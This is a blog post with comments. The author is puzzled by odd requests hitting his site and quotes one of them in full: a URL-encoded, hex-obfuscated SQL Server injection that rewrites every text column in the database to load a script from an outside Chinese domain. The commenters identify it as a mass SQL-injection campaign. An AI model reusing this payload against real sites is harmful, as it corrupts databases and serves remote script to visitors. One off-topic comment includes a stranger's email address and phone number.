Seriously, WTF?
Not sure if some new worm or exploit has exploded upon the internet, but I'm seeing some really bizarre hits on my site today. Requests for stuff like:
/programming/38/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
What is that, an SQL injection attack for SQL Server? Which might be quite the issue if my site wasn't hosted on a Linux server. (Or, quite the issue if I was running on a webhost that hosted SQL Server on the same box as web with no firewall... which I suppose would be its own WTF.)
Comments
Yes, it's an attempted sql injection
Although it's not necessarily specific to MS SQL server.
SQL Injection
OK... I recognized CAST from SQL Server, but the only other database server I'm familiar with is MySQL, and I've never used it there.
Interestingly enough, Chris Love mentioned this in his httpModules and httpHandlers talk at CodeStock--he said he'd seen it active in the last 36 hours.
Interestingly enough, Chris Love mentioned this in his httpModules and httpHandlers talk at CodeStock--he said he'd seen it active in the last 36 hours.
It's been in the wild for a while
About 6 months or so (I think).
Probably someone released a new version of the script for the kiddies.
Probably someone released a new version of the script for the kiddies.
DasBlog down
http://www.hanselman.com/blog/HackedAndIDidntLikeItURLScanIsStepZero.aspx
It apparently takes down DasBlog, which ironically doesn't use a database but just plain xml files.
It apparently takes down DasBlog, which ironically doesn't use a database but just plain xml files.
url rewriting for asp.net 2.0 using http handler
hi sir
plz see the this web site:- http://site.thewebexperts.info/index.aspx
ulr query string pass actual url for this:-
http://site.thewebexperts.info/subcategorypagedetails.aspx?cate=Services&sub=Services2
replace
I want To This :- http://site.thewebexperts.info/subcategorypagedetails.aspx/Services/Services2
so plz solve my problem and send me full exp. for my email id :- subhashyadav2007@gmail.com
ok
thk.
subhash
9250166836
plz see the this web site:- http://site.thewebexperts.info/index.aspx
ulr query string pass actual url for this:-
http://site.thewebexperts.info/subcategorypagedetails.aspx?cate=Services&sub=Services2
replace
I want To This :- http://site.thewebexperts.info/subcategorypagedetails.aspx/Services/Services2
so plz solve my problem and send me full exp. for my email id :- subhashyadav2007@gmail.com
ok
thk.
subhash
9250166836
Post a Comment
To post a comment to this blog entry, login below: